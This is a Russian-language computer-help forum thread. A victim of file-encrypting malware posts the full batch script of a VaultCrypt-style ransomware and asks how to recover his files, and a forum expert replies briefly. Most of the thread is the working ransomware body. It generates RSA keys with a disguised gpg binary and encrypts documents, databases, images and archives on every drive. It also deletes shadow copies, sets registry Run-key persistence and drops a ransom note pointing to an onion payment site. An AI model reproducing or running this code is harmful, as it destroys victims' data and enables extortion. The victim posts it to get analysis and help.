Перейти к содержанию

Криптор по Вашей спецификации ransom.scatter..... далее буквы

billandrew

От billandrew
в Компьютерная помощь

 Share

Рекомендуемые сообщения

billandrew Новичок

billandrew

Опубликовано
Опубликовано

Удалось получить полный набор файлов после работы вируса... правда не все папки обработал.....

как видно из работы вируса шифрование идёт бесплатной "gnu" программой gpg....

неужели Вы не посмотрели, что происходит в результате работы .js скрипта?

Не верю...

Да батник мощный 32 кБ.... 

Неужели Ваша группа не скажет как декриптовать файлы....  ? Или рекомендации выдать?... Вчера Вам выкладывал тело... ни ответа ни привета.... А DR WEB сказал виряк...

Заразил виртуалку ... посмотрел...Ну просто не только этим на работе приходится заниматься... есть серваки с бэкупами ...это спасает

Настораживает реагирование Вашей команды на обновление...

Но!!

Жду от Вас ответов... 

 

У нас установлен корпоративный KES 8 ....

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

 

 


Вчера Вам выкладывал тело
Кому и что Вы выкладывали, нам неведомо.

 

 

Про RSA-шифрование почитайте и картинка у Вас сложится

Ссылка на комментарий
Поделиться на другие сайты
billandrew Новичок

billandrew

Опубликовано
  • Автор
Опубликовано

Давайте рассмотрим механизм вируса ... приходит .js скрипт... который формирует исполняемые файлы для исполнения (шифрации... генерит ключи)
даллее исполняется bat файл

 
 
 

тушка:

 

@ECHO OFF
SetLocal EnableDelayedExpansion
cd "%temp%"
if not exist "%temp%\f44cf952.46ea399a" (
echo 85ceb2b1 > "%temp%\f44cf952.46ea399a"
attrib +s +h "%temp%\f44cf952.46ea399a"
) else (goto 85ceb2b1)
RENAME "%temp%\sv.css" svchost.exe
chcp 866
set 09a1fc9f=!RANDOM!
set a4503f0c=!RANDOM!
set a1a467b7=!RANDOM!
set bca3d227=!RANDOM!
set 376941d6=!RANDOM!
set f7adffe3=!RANDOM!
set cfc85ace=!RANDOM!
set 5378782f=RU
if exist "%APPDATA%\gnupg" RENAME "%APPDATA%\gnupg" gnupg_%random%
echo Key-Type: RSA> "%temp%\c59c6019.63418256"
echo Key-Length: 1024>> "%temp%\c59c6019.63418256"
echo Name-Real: Cellar>> "%temp%\c59c6019.63418256"
echo Name-Comment: Cellar>> "%temp%\c59c6019.63418256"
echo Name-Email: v@u.lt>> "%temp%\c59c6019.63418256"
"%temp%\svchost.exe" --batch --homedir "%temp%" --gen-key "%temp%\c59c6019.63418256"
echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%temp%\0e2b6c70.05ecac0a"
echo Version: GnuPG v1>> "%temp%\0e2b6c70.05ecac0a"
echo.>> "%temp%\0e2b6c70.05ecac0a"
echo mI0EVMTCdAEEALiK/XRUVtlYEgRgVsCdCGOFuuPlAayDcpq0mPXZTWX6hqkw6zJp>> "%temp%\0e2b6c70.05ecac0a"
echo Wtq66dUSeqFq2uFD8Gf1sYGanUztuwNHGCJcZOmCEhuzwu5aDOjfgQic4iRrwzIs>> "%temp%\0e2b6c70.05ecac0a"
echo mhXNVJ7o4iShfaVDWqJYxx2EkIakG8PefpqS57uB9Qncka+BGvu889C7ABEBAAG0>> "%temp%\0e2b6c70.05ecac0a"
echo SFZhdWx0Q3J5cHQgKFZhdWx0Q3J5cHQpIDxCTS1OQkpheHJ0NHJpdVZyQ3E1TlZj>> "%temp%\0e2b6c70.05ecac0a"
echo THJGQzVDWUNZa3hwbUBCaXRtZXNzYWdlPoi4BBMBAgAiBQJUxMJ0AhsDBgsJCAcD>> "%temp%\0e2b6c70.05ecac0a"
echo AgYVCAIJCgsEFgIDAQIeAQIXgAAKCRAW1lPUttqywK3UA/4ut/3gHWP43kANXaS1>> "%temp%\0e2b6c70.05ecac0a"
echo BZOwrqM8jZIHM/37nKfjpyy0t7YBGJL3bvkW7R+119jXIb6A+0lJTuBYGPkaiK3w>> "%temp%\0e2b6c70.05ecac0a"
echo iSER5Nrlkbu2Ph1i1ammIz/zZ8M12YWgLXlUYEaan7X5qKwXPsLcliAuqaL/lPyh>> "%temp%\0e2b6c70.05ecac0a"
echo Ln9O8Y1tY7D4zm2nl5vTxnopaLiNBFTEwnQBBADZHzHXCsAqeA2LwGEVhgny8JQ+>> "%temp%\0e2b6c70.05ecac0a"
echo 301eW/rtPzcVSq0j7vmkEO8jO8PVabkOCwflAlfZgtuFaJD49KvcQRcDPXSN2kJI>> "%temp%\0e2b6c70.05ecac0a"
echo mvfYRflRupa7lq0LnGlOsndGbpzjjZRUHBNeUR+LQbZnRfnBpqFDIKk3/uhPFNDg>> "%temp%\0e2b6c70.05ecac0a"
echo djrZYRLcl2tJa3V9zwARAQABiJ8EGAECAAkFAlTEwnQCGwwACgkQFtZT1LbassCL>> "%temp%\0e2b6c70.05ecac0a"
echo 5wP+O5Js6zJT/cFYCcUuWuYs9wIng65Y+YV+y6/7p8/OTwfxazhB65fG7hdThYPt>> "%temp%\0e2b6c70.05ecac0a"
echo 9b4dgiEBdefeDvZwAWE5CJwdAeTsJT3OuPrMq9/fRaW3gooP/sJoWRS47mQGnIiu>> "%temp%\0e2b6c70.05ecac0a"
echo DeONVwIPHeUzrKd1+jSCHcUvbJ4stmOpSNm5mGy6Ww2DKoM=>> "%temp%\0e2b6c70.05ecac0a"
echo =E61M>> "%temp%\0e2b6c70.05ecac0a"
echo -----END PGP PUBLIC KEY BLOCK----->> "%temp%\0e2b6c70.05ecac0a"
"%temp%\svchost.exe" -r Cellar --export-secret-keys --yes --homedir "%temp%" -a> "%temp%\94a07c55.e3bc4cda"
del /f /q "%temp%\c59c6019.63418256"
echo.>> "%temp%\94a07c55.e3bc4cda"
echo BDATE: !DATE!>> "%temp%\94a07c55.e3bc4cda"
echo UNAME: !USERNAME!>> "%temp%\94a07c55.e3bc4cda"
echo CNAME: !COMPUTERNAME!>> "%temp%\94a07c55.e3bc4cda"
echo ULANG: !5378782f!>> "%temp%\94a07c55.e3bc4cda"
echo 01HSH: !09a1fc9f!>> "%temp%\94a07c55.e3bc4cda"
echo 02HSH: !a4503f0c!>> "%temp%\94a07c55.e3bc4cda"
echo 03HSH: !bca3d227!>> "%temp%\94a07c55.e3bc4cda"
echo 04HSH: !a1a467b7!>> "%temp%\94a07c55.e3bc4cda"
echo 05HSH: !376941d6!>> "%temp%\94a07c55.e3bc4cda"
echo FHASH: !f7adffe3!>> "%temp%\94a07c55.e3bc4cda"
echo chcp 866 > "%temp%\d3953d7b.0be0992b"
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :22ecc455 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 01FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto d031f0d0
:22ecc455
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:d031f0d0
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\7415c2e1.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\7415c2e1.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\7415c2e1.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\7415c2e1.vbs"
echo var cdp="%%TEMP%%\\3c21b8d9.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\70e43f3c.js"
echo.> "%temp%\3c21b8d9.cmd"
echo SetLocal EnableDelayedExpansion>> "%temp%\3c21b8d9.cmd"
echo for /f "tokens=2*" %%%%i in ^('reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"'^) do set fnd7=%%%%j>> "%temp%\3c21b8d9.cmd"
echo if not %%fnd7:~0,1%% GEQ 6 goto 1fe9ff9e>> "%temp%\3c21b8d9.cmd"
echo set ntries=^0>> "%temp%\3c21b8d9.cmd"
echo :641d832b>> "%temp%\3c21b8d9.cmd"
echo wscript.exe //B //Nologo "%%temp%%\7415c2e1.vbs"^& tasklist^|findstr /i wmic.exe>> "%temp%\3c21b8d9.cmd"
echo if not ^^!errorlevel^^!==0 ^(>> "%temp%\3c21b8d9.cmd"
echo set /a ntries+=^1>> "%temp%\3c21b8d9.cmd"
echo if not ^^!ntries^^! GEQ 16 goto 641d832b>> "%temp%\3c21b8d9.cmd"
echo ^)>> "%temp%\3c21b8d9.cmd"
echo :1fe9ff9e>> "%temp%\3c21b8d9.cmd"
echo del /f /q "%temp%\70e43f3c.js">> "%temp%\3c21b8d9.cmd"
echo del /f /q "%temp%\7415c2e1.vbs">> "%temp%\3c21b8d9.cmd"
echo echo del /f /q "%temp%\7415c2e1.vbs">> "%temp%\3c21b8d9.cmd"
echo echo f3fb8b4e ^> "%%temp%%\3c21b8d9.cmd">> "%temp%\3c21b8d9.cmd"
start wscript.exe //B //Nologo "%temp%\70e43f3c.js"
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :749220a2 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 02FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto fcadef08
:749220a2
dir /B "%1:\"&& for /r "%1:\" %%i in (*.pdf *.rtf) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:fcadef08
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :215d84d4 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 03FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto fe59fbb1
:215d84d4
dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:fe59fbb1
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :bb6b9a06 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 04FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto 397f0a8e
:bb6b9a06
dir /B "%1:\"&& for /r "%1:\" %%i in (*.cd *.mdb *.1cd *.dbf *.sqlite) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:397f0a8e
FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :bf36bc0d %%s
echo if exist "%%TeMp%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 05FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto 770353bd
:bf36bc0d
dir /B "%1:\"&& for /r "%1:\" %%i in (*.jpg *.zip) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:770353bd
echo echo FHASH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo echo FHASH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo echo FHASH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo echo 6bec1173 ^> "%%TeMp%%\440b0b96.cmd">> "%temp%\d3953d7b.0be0992b"
echo del /f /q "%%TeMp%%\440b0b96.cmd">> "%temp%\d3953d7b.0be0992b"
findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\6ed1feb7.f8c26ce8"> "%temp%\c01bb50a.dff42b50"
findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\d3953d7b.0be0992b"> "%temp%\840a10bd.16b4915e"
findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\c01bb50a.dff42b50"> "%temp%\ea2f8672.381f76bf"
findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\840a10bd.16b4915e"> "%temp%\440b0b96.cmd"
del /f /q "%temp%\c01bb50a.dff42b50"
del /f /q "%temp%\840a10bd.16b4915e"
del /f /q "%temp%\6ed1feb7.f8c26ce8"
del /f /q "%temp%\d3953d7b.0be0992b"
echo XCONF: !cfc85ace!>> "%temp%\94a07c55.e3bc4cda"
set c47f173a=66668
for /f %%f in ('find /c /v ""^< "%temp%\ea2f8672.381f76bf"') do (
set c47f173a=%%f
)
echo QNTTY: !c47f173a!>> "%temp%\94a07c55.e3bc4cda"
for %%c IN (01:xls 04:doc 05:rtf 10:pdf 11:psd 12:dwg 13:cdr 19:cd 20:mdb 21:1cd 23:dbf 24:sqlite 26:jpg 27:zip) do (
for /f "tokens=1,2 delims=:" %%i in ("%%c") do (
for /f %%b in ('find /c /i ".%%j"^< "%temp%\ea2f8672.381f76bf"') do (
echo %%iEXT: %%b>> "%temp%\94a07c55.e3bc4cda"
)))
echo 02EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 03EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 06EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 07EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 08EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 09EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 14EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 15EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 16EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 17EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 18EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 22EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 25EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 28EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 29EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo.>> "%temp%\ea2f8672.381f76bf"
echo XCONF: !cfc85ace!>> "%temp%\ea2f8672.381f76bf"
"%temp%\svchost.exe" --import "%temp%\0e2b6c70.05ecac0a"
del /f /q "%temp%\0e2b6c70.05ecac0a"
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\VAULT.KEY" -e "%temp%\94a07c55.e3bc4cda"
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\CONFIRMATION.KEY" -e "%temp%\ea2f8672.381f76bf"
if not exist "%temp%\VAULT.KEY" (
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\94a07c55.e3bc4cda"
RENAME "%temp%\94a07c55.e3bc4cda.gpg" VAULT.KEY
)
if not exist "%temp%\CONFIRMATION.KEY" (
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\ea2f8672.381f76bf"
RENAME "%temp%\ea2f8672.381f76bf.gpg" CONFIRMATION.KEY
)
if not exist "%temp%\VAULT.KEY" (
del /f /q "%temp%\*.vlt"
del /f /q "%temp%\*.gpg"
del /f /q "%temp%\random_seed"
del /f /q "%temp%\*.lock"
del /f /q "%temp%\*.bak"
del /f /q "%temp%\*.list"
goto 72fde7d3
)
echo.>> "%temp%\VAULT.KEY"
echo 01FNSH-!09a1fc9f!>> "%temp%\VAULT.KEY"
echo 02FNSH-!a4503f0c!>> "%temp%\VAULT.KEY"
echo 03FNSH-!bca3d227!>> "%temp%\VAULT.KEY"
echo 04FNSH-!a1a467b7!>> "%temp%\VAULT.KEY"
echo 05FNSH-!376941d6!>> "%temp%\VAULT.KEY"
echo FHASH-!f7adffe3!>> "%temp%\VAULT.KEY"
 
echo 6387669ad690e17104442bd2e6355ca8 47b1ab0c40e9cfd9b276ebf8> "%temp%\secring.qpq"
echo 381f76bfc47f173a 72fde7d35d11158147b1ab0cff9c5ac004fba9ba>> "%temp%\secring.qpq"
echo 381f76bf c47f173a72fde7d3 5d11158147b1ab0c ff9c5ac004fba9ba>> "%temp%\secring.qpq"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2>> "%temp%\secring.qpq"
echo bb6b9a06bf36bc0d 770353bd6bec1173440b0b96c01bb50adff42b50>> "%temp%\secring.qpq"
echo 70e43f3c 770353bd e6355ca804442bd2 56f58c2f ff9c5ac004fba9ba>> "%temp%\secring.qpq"
move /y "%temp%\secring.qpq" "%temp%\secring.gpg"
echo 381f76bf c47f173a72fde7d3 5d11158147b1ab0c ff9c5ac004fba9ba> "%temp%\e3bc4cda94a07c55.qpq"
echo bb6b9a06bf36bc0d 770353bd6bec1173440b0b96c01bb50adff42b50>> "%temp%\e3bc4cda94a07c55.qpq"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2>> "%temp%\e3bc4cda94a07c55.qpq"
echo bb6b9a06bf36bc0d 770353bd6bec1173440b0b96c01bb50adff42b50>> "%temp%\e3bc4cda94a07c55.qpq"
echo 70e43f3c 770353bd e6355ca804442bd2 56f58c2f ff9c5ac004fba9ba>> "%temp%\e3bc4cda94a07c55.qpq"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2>> "%temp%\e3bc4cda94a07c55.qpq"
echo 6387669ad690e17104442bd2e6355ca8 47b1ab0c40e9cfd9b276ebf8>> "%temp%\e3bc4cda94a07c55.qpq"
echo 381f76bfc47f173a 72fde7d35d11158147b1ab0cff9c5ac004fba9ba>> "%temp%\e3bc4cda94a07c55.qpq"
move /y "%temp%\e3bc4cda94a07c55.qpq" "%temp%\94a07c55.e3bc4cda"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2> "%temp%\381f76bfea2f8672.qpq"
echo 381f76bfc47f173a 72fde7d35d11158147b1ab0cff9c5ac004fba9ba>> "%temp%\381f76bfea2f8672.qpq"
echo 6387669ad690e17104442bd2e6355ca8 47b1ab0c40e9cfd9b276ebf8>> "%temp%\381f76bfea2f8672.qpq"
move /y "%temp%\381f76bfea2f8672.qpq" "%temp%\ea2f8672.381f76bf"
del /f /q "%temp%\secring.gpg"
del /f /q "%temp%\94a07c55.e3bc4cda"
del /f /q "%temp%\ea2f8672.381f76bf"
del /f /q "%temp%\6ed1feb7.f8c26ce8"
del /f /q "%temp%\random_seed"
del /f /q "%temp%\trustdb.gpg"
del /f /q "%temp%\secring.gpg"
del /f /q "%temp%\*.lock"
del /f /q "%temp%\*.bak"
attrib -s -h -r "%AppData%\gnupg\*.*"
attrib -s -h -r "%AppData%\gnupg"
del /f /q "%AppData%\gnupg\*.*"
rmdir /s /q "%AppData%\gnupg"
copy /y "%temp%\CONFIRMATION.KEY" "%appdata%\CONFIRMATION.KEY"
copy /y "%temp%\VAULT.KEY" "%appdata%\VAULT.KEY"
copy /y "%temp%\VAULT.KEY" "%temp%\04fba9ba_VAULT.KEY"
echo 01FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 02FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 03FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 04FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 05FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo FHASH-OK>> "%temp%\04fba9ba_VAULT.KEY"
attrib +r "%temp%\04fba9ba_VAULT.KEY"
copy /y "%temp%\VAULT.KEY" "%userprofile%\Desktop\VAULT.KEY"
echo.> "%temp%\VAULT.txt"
echo Ваши рабочие документы и базы данных были заблокированы и помечены форматом .vаult >> "%temp%\VAULT.txt"
echo Для их восстановления необходимо получить уникальный ключ>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo   ПРОЦЕДУРА ПОЛУЧЕНИЯ КЛЮЧА: >> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo КРАТКО>> "%temp%\VAULT.txt"
echo 1. Зайдите на наш веб-ресурс>> "%temp%\VAULT.txt"
echo 2. Гарантированно получите Ваш ключ>> "%temp%\VAULT.txt"
echo 3. Восстановите файлы в прежний вид>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo ДЕТАЛЬНО>> "%temp%\VAULT.txt"
echo   Шаг 1:>> "%temp%\VAULT.txt"
echo Скачайте Tor браузер с официального сайта: https://www.torproject.org>>"%temp%\VAULT.txt"
echo   Шаг 2:>> "%temp%\VAULT.txt"
echo Используя Tor браузер посетите сайт: http://restoredz4xpmuqr.onion>>"%temp%\VAULT.txt"
echo   Шаг 3:>> "%temp%\VAULT.txt"
echo Найдите Ваш уникальный VAULT.KEY на компьютере - это Ваш ключ к личной клиент-панели. Не удалите его>> "%temp%\VAULT.txt"
echo Авторизируйтесь на сайте используя ключ VAULT.KEY>> "%temp%\VAULT.txt"
echo Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой>> "%temp%\VAULT.txt"
echo   STEP 4:>> "%temp%\VAULT.txt"
echo После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё ПО>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo ДОПОЛНИТЕЛЬНО>> "%temp%\VAULT.txt"
echo a^) Вы не сможете восстановить файлы без уникального ключа ^(который безопасно хранится на нашем сервере^)>> "%temp%\VAULT.txt"
echo b^) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке TEMP >> "%temp%\VAULT.txt"
echo c^) Ваша стоимость восстановления не окончательная, пишите в чат>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo   Дата блокировки: %date% ^(%time:~0,5%^)>> "%temp%\VAULT.txt"
copy /y "%temp%\VAULT.txt" "%userprofile%\Desktop\vault.txt"
attrib +h "%userprofile%\Desktop\vault.txt"
echo var cdp="%%TeMp%%\\440b0b96.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');>> "%temp%\fabac41c.js"
"%TEMP%\svchost.exe" --import "%TEMP%\pubring.gpg"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "f4e4bf4e" /t REG_SZ /f /d "notepad %temp%\VAULT.txt"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "5dd61003" /t REG_SZ /f /d "attrib -h %userprofile%\Desktop\vault.txt"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "4323ae20" /t REG_SZ /f /d "wscript //B //Nologo %temp%\fabac41c.js"
call "%temp%\440b0b96.cmd"
echo ^<html^>^<head^>^<hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "Yes" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/^>^<style^>body{cursor:default;background-color:#E7E7E7;margin:0;font-family:"HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;text-align:center;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAgMAAADUJKRdAAAACVBMVEXs7Ozv7+/6+vqH/Ct2AAAAW0lEQVQI11WOsQ2DABADv8gAGQFd4SJTZARGQC5cMBX1T0mD4ClP9lmutf71qW/t3d19VBLDcrNR7KV+F4Mx28OKyMzf/UDINvYADR9A08cwfcnjDwmarOBn7wSqEUpFZuJdBQAAAABJRU5ErkJggg==)}.vaustyle{margin:10px;height:520px;width:1100px}.sc{margin:10px 150px;font-size:40px;width:900px;padding:20px;background-color:#7a7a7a;color:#FF4C4C;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}.briefly{position:absolute;left:50px;width:480px}.detailed{display:inline-block;margin-left:530px;width:660px}.bti{background-color:#DFDFDF;color:#555;font-size:28px;padding:10px}hr{width:90%%}.sced{margin-top:15px;text-align:center;font-size:27px;height:220px;padding:20px;background-color:#6a6a6a;line-height:1.5;color:#EAEAEA;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}form{display:inline}.dbutt{margin-left:2px;font-size:16px;font-weight:500;border:none;background-color:#9f9f9f;color:#EEE;cursor:pointer}.footer{text-align:left;position:relative;width:600px;margin:2px 2px 2px 45px;height:16px;font-size:15px;background-color:#CFCFCF;color:#444;padding:6px}.fnl{font-size:21px}^</style^>^<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/^>^<title^>Vault Notification^</title^>^<script language="vbscript"^>> "%temp%\aceb2c042b18bf38.hta"
echo sub Window_Onload>> "%temp%\aceb2c042b18bf38.hta"
echo window.resizeTo 1280,725>> "%temp%\aceb2c042b18bf38.hta"
echo screenWidth = Document.ParentWindow.Screen.AvailWidth>> "%temp%\aceb2c042b18bf38.hta"
echo screenHeight = Document.ParentWindow.Screen.AvailHeight>> "%temp%\aceb2c042b18bf38.hta"
echo posLeft = (screenWidth - 1280) / 2 >> "%temp%\aceb2c042b18bf38.hta"
echo posTop = (screenHeight - 725) / 2 >> "%temp%\aceb2c042b18bf38.hta"
echo window.moveTo posLeft, posTop >> "%temp%\aceb2c042b18bf38.hta"
echo end sub >> "%temp%\aceb2c042b18bf38.hta"
